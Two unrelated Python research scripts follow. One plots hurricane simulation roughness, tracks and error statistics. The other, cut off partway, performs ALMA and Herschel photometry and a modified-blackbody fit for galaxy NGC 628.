Times0=Times[0]
print(Times0)
print(values[0])
print(position[kk])
ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
position2[kk][2]:position2[kk][3]])
ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
size=30, **csfont)
for i in range(0,line_count-1):
if i==0:
#tmp=[float(i)*0.5144444 for i in values[i]]
tmp=[float(i) for i in values[i]]
# elif (i!=2 and i!=3):
else:
tmp=[float(i) for i in values[i]]
# else:
# continue
if hurricanes[kk]=='Katrina':
plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
elif hurricanes[kk]=='Dorian':
plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
else:
plt.plot( Times0, tmp, color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
plt.ylim([1e-11, 3.0])
plt.yscale('log')
c+=1
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(2)
ax.tick_params(length=5, width=2)
fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
frameon=False)
if kk==0 or kk==3:
plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
if kk==2 or kk==3 or kk==4:
plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
plt.title(hurricanes[kk], {'size': 30}, **csfont)
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eye.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
c=0
rows=[]
Times=[]
Times=[]
values=[]
with open(dir_znt_eyewall[kk], mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {", ".join(row)}')
Times.append(list(row.keys()))
line_count += 1
#print(row)
rows.append(row)
values.append(list(row.values()))
line_count += 1
print(f'Processed {line_count} lines.')
Times0=Times[0]
print(Times0)
print(values[0])
print(position[kk])
ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
position2[kk][2]:position2[kk][3]])
ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
size=30, **csfont)
for i in range(0,line_count-1):
if i==0:
#tmp=[float(i)*0.5144444 for i in values[i]]
tmp=[float(i) for i in values[i]]
# elif (i!=2 and i!=3):
else:
tmp=[float(i) for i in values[i]]
# else:
# continue
if hurricanes[kk]=='Katrina':
plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
elif hurricanes[kk]=='Dorian':
plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
else:
plt.plot( Times0, tmp, color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
plt.ylim([1e-11, 3.0])
plt.yscale('log')
c+=1
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(2)
ax.tick_params(length=5, width=2)
fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
frameon=False)
if kk==0 or kk==3:
plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
if kk==2 or kk==3 or kk==4:
plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
plt.title(hurricanes[kk], {'size': 30}, **csfont)
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eyewall.png', dpi=500)
plt.show()
########################
# Plot hurricane track #
########################
fig = plt.figure(figsize=(15,10))
spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
for kk in range(len(hurricanes)):
if hurricanes[kk]=='Katrina':
cons=6
elif hurricanes[kk]=='Dorian':
cons=8
else:
cons=10
real1=[]
oussama1=[]
wrf1=[]
simu1=[]
with open( dir_wt[kk], 'r' ) as f :
data0 = f.read()
data = json.loads('[' + data0.replace('}{', '},{') + ']')
for i in range(0,len(data)):
data2 = list(data[i].values())
data3 = [e for sl in data2 for e in sl]
for j in range(len(data3)):
data3[j].pop(0)
if i==0:
real1.append(data3)
# elif i==1:
# oussama1.append(data3)
# elif i==2:
# wrf1.append(data3)
else:
simu1.append(data3)
real1 = np.array(real1, dtype=np.float32)
simu1 = np.array(simu1, dtype=np.float32)
real_r = np.radians(real1)
simu_r = np.radians(simu1)
term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
# size=30)
slp2D = pickle.load( open( dir_p[kk], "rb" ) )
lats, lons = latlon_coords(slp2D)
# Get the cartopy mapping object (use original data, rather than any processed data)
cart_proj = get_cartopy(slp2D)
# Set the GeoAxes to the projection used by WRF
#ax = plt.axes(projection=cart_proj)
ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
# ax.stock_img()
# Download and add the states and coastlines
states = NaturalEarthFeature(category="cultural", scale="50m",
facecolor="none",
name="admin_1_states_provinces_shp")
ax.add_feature(states, linewidth=.5, edgecolor="black")
ax.coastlines('50m', linewidth=0.8)
# Set the map bounds
# ax.set_xlim(cartopy_xlim(slp2D))
# ax.set_ylim(cartopy_ylim(slp2D))
ax.set_extent(lat_log_bound[kk])
ax.background_img(name='SR', resolution='high')
# Show grid lines.
gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
gl.xlabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
gl.ylabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
gl.xlabels_top = False
gl.ylabels_right = False
c=0
ll=[]
rr=[]
for i in range(real1.shape[0]):
for j in range(real1.shape[1]):
if j<cons:
ll.append(real1[i][j][0])
rr.append(real1[i][j][1])
ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
linestyle=list(linestyles.values())[c],\
markersize=sizes[c], transform=crs.PlateCarree())
c+=1
ll=[]
rr=[]
for i in range(simu1.shape[0]):
for j in range(simu1.shape[1]):
if j<cons:
ll.append(simu1[i][j][0])
rr.append(simu1[i][j][1])
ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
linestyle=list(linestyles.values())[c],\
markersize=sizes[c], transform=crs.PlateCarree())
c+=1
ll=[]
rr=[]
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(15)
fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
frameon=False)
plt.title(hurricanes[kk], {'size': 25}, **csfont)
# plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
# loc = "upper right", prop={'size': 7})
# plt.xlabel("Lon", fontsize=135)
# plt.ylabel("Lat", fontsize=135)
# plt.title(hurricanes[kk], {'size': 35}, **csfont)
# plt.show()
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
plt.show()
# fig = plt.figure(figsize=(15,10))
# spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# m = Basemap(projection='merc', llcrnrlat=lat_log_bound[kk][2],\
# urcrnrlat=lat_log_bound[kk][3], \
# llcrnrlon=lat_log_bound[kk][0], \
# urcrnrlon=lat_log_bound[kk][1], resolution= 'f' )
# m.drawstates()
# m.drawmeridians([-100, -90, -80, -70, -60, -50, -40, ], color='k', textcolor='k', linewidth=1.5,
# zorder=None, dashes=[6, 1000], labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None,
# yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawparallels([10, 15, 20, 25, 30, 35], color='k', textcolor='k', linewidth=1.5, zorder=None, dashes=[6, 1000],
# labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None, yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawmapscale(-101, 8, -96, 8, 1000, barstyle='fancy', units='km', fontsize=8)
# m.drawcoastlines(linewidth=0.7, linestyle='solid', color='grey')
# m.drawcountries()
# m.shadedrelief()
# m.drawmapboundary()
# # ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
# # ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
# # size=30)
# slp2D = pickle.load( open( dir_p[kk], "rb" ) )
# lats, lons = latlon_coords(slp2D)
# # Get the cartopy mapping object (use original data, rather than any processed data)
# cart_proj = get_cartopy(slp2D)
# # Set the GeoAxes to the projection used by WRF
# #ax = plt.axes(projection=cart_proj)
# ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
# ax.stock_img()
# # Download and add the states and coastlines
# states = NaturalEarthFeature(category="cultural", scale="50m",
# facecolor="none",
# name="admin_1_states_provinces_shp")
# ax.add_feature(states, linewidth=.5, edgecolor="black")
# ax.coastlines('50m', linewidth=0.8)
# # Set the map bounds
# # ax.set_xlim(cartopy_xlim(slp2D))
# # ax.set_ylim(cartopy_ylim(slp2D))
# ax.set_extent(lat_log_bound[kk])
# # Show grid lines.
# gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
# linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
# gl.xlabel_style = {'size': 15, 'color': 'k'}
# gl.ylabel_style = {'size': 15, 'color': 'k'}
# gl.xlabels_top = False
# gl.ylabels_right = False
# c=0
# ll=[]
# rr=[]
# for i in range(real1.shape[0]):
# for j in range(real1.shape[1]):
# if j<6:
# ll.append(real1[i][j][0])
# rr.append(real1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for i in range(simu1.shape[0]):
# for j in range(simu1.shape[1]):
# if j<6:
# ll.append(simu1[i][j][0])
# rr.append(simu1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_linewidth(15)
# fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
# frameon=False)
# plt.title(hurricanes[kk], {'size': 25}, **csfont)
# # plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
# # loc = "upper right", prop={'size': 7})
# # plt.xlabel("Lon", fontsize=135)
# # plt.ylabel("Lat", fontsize=135)
# # plt.title(hurricanes[kk], {'size': 35}, **csfont)
# # plt.show()
# plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
# plt.show()
# ###################
# # Plot error bars #
# ###################
# simu_error = []
# for kk in range(len(hurricanes)):
# rows1=[]
# Times1=[]
# Times1=[]
# values1=[]
# real1_track=[]
# with open(dir_wi[kk], mode='r') as csv_file:
# csv_reader = csv.DictReader(csv_file)
# line_count = 0
# sim_count = 0
# for row in csv_reader:
# if line_count == 0:
# print(f'Column names are {", ".join(row)}')
# Times1.append(list(row.keys()))
# real1_track.append(list(row.values()))
# line_count += 1
# else:
# rows1.append(row)
# values1.append(list(row.values()))
# line_count += 1
# print('There is totally ',(line_count-1)*(len(row)),' data points')
# simu1=np.array(values1, dtype=np.float32)
# real1=np.array(real1_track, dtype=np.float32)
# real1=real1*0.5144444
# real1=real1
# simu_error1=abs(simu1-real1[:,None])/real1[:,None]#/((line_count-3)*(len(row)))
# print('absolute pressure error')
# print(abs(simu1-real1[:,None]))
# simu_error.append(simu_error1)
# par1_error_wi=np.zeros((4, 9))
# par2_error_wi=np.zeros((4, 9))
# par3_erro_wir=np.zeros((4, 9))
# par4_error_wi=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wi=np.concatenate((simu_error1[0][0][0:5],simu_error2[0][0][:],\
# simu_error3[0][0][:],simu_error4[0][0][:-2],simu_error5[0][0][:]))
# par1_error_wi=par1_error_wi.flatten()
# par1_error_wi_mean=np.mean(par1_error_wi)
# par1_error_wi_std=np.std(par1_error_wi)
# par1_error_wi_low=np.percentile(par1_error_wi, 20)
# par1_error_wi_hgh=np.percentile(par1_error_wi, 80)
# par2_error_wi=np.concatenate((simu_error1[0][1][0:5],simu_error2[0][1][:],\
# simu_error3[0][1][:],simu_error4[0][1][:-2],simu_error5[0][1][:]))
# par2_error_wi=par2_error_wi.flatten()
# par2_error_wi_mean=np.mean(par2_error_wi)
# par2_error_wi_std=np.std(par2_error_wi)
# par2_error_wi_low=np.percentile(par2_error_wi, 20)
# par2_error_wi_hgh=np.percentile(par2_error_wi, 80)
# par3_error_wi=np.concatenate((simu_error1[0][2][0:5],simu_error2[0][2][:],\
# simu_error3[0][2][:],simu_error4[0][2][:-2],simu_error5[0][2][:]))
# par3_error_wi=par3_error_wi.flatten()
# par3_error_wi_mean=np.mean(par3_error_wi)
# par3_error_wi_std=np.std(par3_error_wi)
# par3_error_wi_low=np.percentile(par3_error_wi, 20)
# par3_error_wi_hgh=np.percentile(par3_error_wi, 80)
# par4_error_wi=np.concatenate((simu_error1[0][3][0:5],simu_error2[0][3][:],\
# simu_error3[0][3][:],simu_error4[0][3][:-2],simu_error5[0][3][:]))
# par4_error_wi=par4_error_wi.flatten()
# par4_error_wi_mean=np.mean(par4_error_wi)
# par4_error_wi_std=np.std(par4_error_wi)
# par4_error_wi_low=np.percentile(par4_error_wi, 20)
# par4_error_wi_hgh=np.percentile(par4_error_wi, 80)
# simu_error = []
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# simu_error.append(simu_error1)
# par1_error=np.zeros((4, 9))
# par2_error=np.zeros((4, 9))
# par3_error=np.zeros((4, 9))
# par4_error=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wt=np.concatenate((simu_error1[0][0:5],\
# simu_error2[0][:],simu_error3[0][:],\
# simu_error4[0][:-2],simu_error5[0][:]))
# par1_error_wt=par1_error_wt.flatten()
# par1_error_wt_mean=np.mean(par1_error_wt)
# par1_error_wt_std=np.std(par1_error_wt)
# par1_error_wt_low=np.percentile(par1_error_wt, 20)
# par1_error_wt_hgh=np.percentile(par1_error_wt, 80)
# par2_error_wt=np.concatenate((simu_error1[1][0:5],\
# simu_error2[1][:],simu_error3[1][:],\
# simu_error4[1][:-2],simu_error5[1][:]))
# par2_error_wt=par2_error_wt.flatten()
# par2_error_wt_mean=np.mean(par2_error_wt)
# par2_error_wt_std=np.std(par2_error_wt)
# par2_error_wt_low=np.percentile(par2_error_wt, 20)
# par2_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par3_error_wt=np.concatenate((simu_error1[2][0:5],\
# simu_error2[2][:],simu_error3[2][:],\
# simu_error4[2][:-2],simu_error5[2][:]))
# par3_error_wt=par3_error_wt.flatten()
# par3_error_wt_mean=np.mean(par3_error_wt)
# par3_error_wt_std=np.std(par3_error_wt)
# par3_error_wt_low=np.percentile(par2_error_wt, 20)
# par3_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par4_error_wt=np.concatenate((simu_error1[3][0:5],\
# simu_error2[3][:],simu_error3[3][:],\
# simu_error4[3][:-2],simu_error5[3][:]))
# par4_error_wt=par4_error_wt.flatten()
# par4_error_wt_mean=np.mean(par4_error_wt)
# par4_error_wt_std=np.std(par4_error_wt)
# par4_error_wt_low=np.percentile(par4_error_wt, 20)
# par4_error_wt_hgh=np.percentile(par4_error_wt, 80)
# print(par4_error_wt_low, par4_error_wt_mean, par4_error_wt_hgh)
# x_pos = np.arange(len(models))
# CTEs_wi = [par1_error_wi_mean,\
# par2_error_wi_mean,par3_error_wi_mean,par4_error_wi_mean]
# errors_wi = [par1_error_wi_std,\
# par2_error_wi_std,par3_error_wi_std,par4_error_wi_std]
# percentile_10_wi = np.array([par1_error_wi_mean-par1_error_wi_low,\
# par2_error_wi_mean-par2_error_wi_low,par3_error_wi_mean-par3_error_wi_low, \
# par4_error_wi_mean-par4_error_wi_low])
# percentile_90_wi = np.array([par1_error_wi_hgh-par1_error_wi_mean,\
# par2_error_wi_hgh-par2_error_wi_mean,par3_error_wi_hgh-par3_error_wi_mean, \
# par4_error_wi_hgh-par4_error_wi_mean])
# err_wi = np.vstack((percentile_10_wi, percentile_90_wi))
# CTEs_wt = [par1_error_wt_mean,\
# par2_error_wt_mean,par3_error_wt_mean,par4_error_wt_mean]
# errors_wt = [par1_error_wt_std,\
# par2_error_wt_std,par3_error_wt_std,par4_error_wt_std]
# percentile_10_wt = np.array([par1_error_wt_mean-par1_error_wt_low,\
# par2_error_wt_mean-par2_error_wt_low,par3_error_wt_mean-par3_error_wt_low, \
# par4_error_wt_mean-par4_error_wt_low])
# percentile_90_wt = np.array([par1_error_wt_hgh-par1_error_wt_mean,\
# par2_error_wt_hgh-par2_error_wt_mean,par3_error_wt_hgh-par3_error_wt_mean, \
# par4_error_wt_hgh-par4_error_wt_mean])
# print(percentile_90_wt)
# err_wt = np.vstack((percentile_10_wt, percentile_90_wt))
# # fig, ax = plt.subplots(1, 2, figsize=(40, 8), sharex=True)
# fig = plt.figure(figsize=(8,5))
# spec = mpl.gridspec.GridSpec(ncols=8, nrows=5)
# ax = fig.add_subplot(spec[1:,0:4])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[0]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wi, yerr=err_wi, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Normalized Intensity', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{:,.0%}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[1:,4:])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[1]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wt, yerr=err_wt, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Track Error (km)', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[0,0:])
# handles = [plt.Rectangle((0,0),1,1, facecolor=colors[i+1], \
# linestyle=list(linestyles.values())[0], edgecolor = 'k', linewidth=1.5\
# ) for i in range(len(models))]
# plt.legend(handles, models, ncol=4, bbox_to_anchor=(0.9, 0.8), prop=fontbar, \
# frameon=False)
# ax.axes.xaxis.set_visible(False)
# ax.axes.yaxis.set_visible(False)
# ax.set_yticks([])
# ax.set_yticklabels([])
# ax.set_xticks([])
# ax.set_xticklabels([])
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_visible(False)
# # for i, v in enumerate(CTEs):
# # ax.text(i, v+0.02, str(round(v, 3)), color='red', fontweight='bold')
# # Save the figure and show
# fig.autofmt_xdate()
# plt.tight_layout()
# #plt.savefig('wind_intensity_bar_plot.png')
# plt.savefig('C:/Users/limgr/Desktop/wi_wt_bar_plots.png', dpi=500)
# plt.show()
|
#!/d/users/turner/tools/anaconda3/bin/python
"""
big 'ole python script that (hopefully) goes through the entire science procedure for give band 4 and band 7 fits files
notes are given in science.md
**python3**
to run:
ipython
exec(open('science.py').read())
"""
import numpy as np
import matplotlib.pyplot as plt
import astropy
from astropy.io import fits
import os, sys, subprocess
from astropy import constants as const
# add scripts directory to the path
sys.path.insert(0, '/uwpa2/turner/legus-alma/scripts/')
from ds9_regions_from_sextractor import get_regions
from get_sextractor_in_footprint import in_footprint
from overlapping_regions import overlap
from mcmc_error_bars import mcmc_error
from nearest_cluster import nearest_cluster
"""
if starting with new band 4 and band 7 fits files, you need to:
1. make sure to have pbcoverage files
2. take global.deg.reg and make new pixel files for band 4 and band 7
data1 --> results for sextractor with 5 pixels > 2 sigma
data2 --> results for sextractor with 5 pixels > 2.5 sigma
data3 --> results for sextractor with 5 pixels > 3.0 sigma
data4 --> retry sextractor 5pix > 2 sigma
data5 --> retry sextractor 5pix > 2.5 sigma
data6 --> retry sextractor 5pix > 3.0 sigma
data7 --> sextractor 2pix > 2 sigma
data8 --> sextractor 2pix > 3 sigma
data_oct23 --> using band4.ilsang.pbcor.fits & band7.ilsang.pbcor.fits | sextractor with 5 pixels > 2 sigma
data_oct23_2 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 2 sigma
data_oct23_3 --> using band4.ilsang.pbcor.fits & band7.ilsang.feather.fits | sextractor with 5 pixels > 3 sigma
data_nov13 --> redo data_oct23 but with much closer overlapping criteria
data_jan31 --> double check if fluxes are being correctly calculated from sextractor
50 contigous pixels > 2 sigma (50 pixels ~ 1/5 beam size)
data_feb5 --> same as before just now outputs the source fluxes [W/m2] in a seperate file
data_feb7 --> last one
data_feb8 --> nevermind this is the last one since overlapping_regions was set to 2.2 arcsec for the separation
but want to have just 1.1 arcsec (beam size)
data_feb12 --> just kidding, this is the last one. fixed beam sizes in fluxes section
"""
# decide what you want:
global_phot = True # perform global photometry?
regions = True # use sextractor to get dust regions and whatnot?
fluxes = True # calculate flux in dust regions and get slopes?
create_legus_region_files = False # create ds9 region files from legus cluster catalog? (probably not necessary since those files are already on the github repo)
closest_clusters = True # find closest stellar clusters to dust regions?
plot = True # do some plotting?
backup = True # backup files
backup_dir = 'data_feb12'
main_dir = '/uwpa2/turner/legus-alma/'
os.chdir(main_dir + 'science')
# define the band 4 and band 7 fits files to use
b4_fits = 'band4.ilsang.pbcor.fits'
b7_fits = 'band7.ilsang.pbcor.fits'
# define the other fits files needed
b4_pbcoverage = 'band4.ilsang.pb.fits'
b7_pbcoverage = 'band7.ilsang.pb.fits'
# defining some functions
def slope(x,y):
"""simple function to return the slope of a log line connecting two points
"""
return (np.log10(y[1]) - np.log10(y[0])) / (np.log10(x[1]) - np.log10(x[0]))
def mbb_func_freq(freq, beta, T, sr_in_images):
C3 = 2 * const.h.value / const.c.value**2
C4 = const.h.value / const.k_B.value
bb = C3 * (freq**(3 + beta)) / (np.exp(C4*freq/T) - 1)
return bb * freq * sr_in_images
# global photometry modified blackbody fit
if global_phot:
from modBBfit import fit
print('\ndoing global photometry bidness \n')
os.chdir(main_dir + 'science/herschel/')
# first need pixel scale of the PACS and SPIRE images. units are MJy*pix/sr. we want Jy
head = fits.open('NGC0628_S500_110_SSS_111_PACSS_70.fits')[0].header
cd11 = head['CD1_1'] # deg/pix
cd22 = head['CD2_2'] # deg/pix
pix_scale_sr = (-cd11 * 3600)*(cd22*3600) / 4.255e10 # sr/pix
# read in phot data from tables.asc
net, num_of_pix = np.loadtxt('tables.asc', usecols=[1,2], unpack=True)
# total number of sr in the images
sr_in_images = pix_scale_sr * num_of_pix[0]
# wavelengths of the hershcel images
wavel = np.array([71.8, 103.0, 157.0, 252.0, 353.0, 511.0])*1.0e-6 # meters
# convert to frequencies
freq = const.c.value/wavel # Hz
# now convert flux from MJy*pix/sr to Jy
net = net * pix_scale_sr * 1e6
flux = net * freq # nu*F_nu
# calculate error in fluxes
sky_sigma, n_sky = np.loadtxt('sky.sigma.temp.dat', usecols=[2,3], unpack=True)
flux_err = sky_sigma * np.sqrt(num_of_pix + num_of_pix**2/n_sky)
cal_err = np.array([.05, .05, .05, .07, .07, .07])*flux
flux_err = flux_err * pix_scale_sr * freq * 1e6
flux_err = np.sqrt(flux_err**2 + cal_err**2)*1e-26
beta, T = fit(freq, flux, flux_err, sr_in_images)
# array of wavelengths for fitting
wfit = np.arange(50, 1e4, 10)
# free-free and synchrotron
ff_flux0 = 12.319e-19
sync_flux0 = 4.567e-19
# alma freq
alma_freq = np.array([1.45E+11, 3.43E+11])
alma_wavel = const.c.value/alma_freq[0] * 1e6
bb = mbb_func_freq(const.c.value/(wfit*1e-6), beta[0], T[0], sr_in_images)*1e-26
ff = ff_flux0 * (alma_wavel/wfit)**.9
sync = sync_flux0 * (alma_wavel/wfit)**.2
flux_sum = bb + ff + sync
# alma global phot
anet, anum_of_pix = np.loadtxt(main_dir+'/science/global/tables.4.asc', usecols=[1,2], unpack=True)
# net is in units Jy*pix/beam
b4_hdulist = fits.open(main_dir+ 'science/'+b4_fits)
b4_hdu = b4_hdulist[0]
b4_header = b4_hdu.header
b4_bmaj = b4_header['bmaj'] * 3600.0
b4_bmin = b4_header['bmin'] * 3600.0
b7_hdulist = fits.open(main_dir+'science/'+b7_fits)
b7_hdu = b7_hdulist[0]
b7_header = b7_hdu.header
b7_bmaj = b7_header['bmaj'] * 3600.0
b7_bmin = b7_header['bmin'] * 3600.0
beams = np.array([ np.pi/4.0 *b4_bmaj * b4_bmin, np.pi/4.0 * b7_bmaj*b7_bmin])
pixel_size = 0.06**2
pix_per_beam = beams/pixel_size
alma_flux = anet / pix_per_beam # Jy
print('\nband7 flux = %1.5f Jy\n'%alma_flux[1])
print('\nband4 flux = %1.5f Jy\n'%alma_flux[0])
# save alma data
np.savetxt(main_dir+'science/global/alma_global_flux.dat',np.transpose([const.c.value/alma_freq * 1e6, alma_flux*alma_freq*1e-26]), header='wavelength (micron) \t flux (W/m2)' )
# save herschel data
np.savetxt('herschel_flux.dat', np.transpose([const.c.value/freq * 1e6, flux*1e-26, flux_err]), header='wavelength (micron) \t flux (W/m2) \t 1 sigma error')
# save bb, ff, and sync data
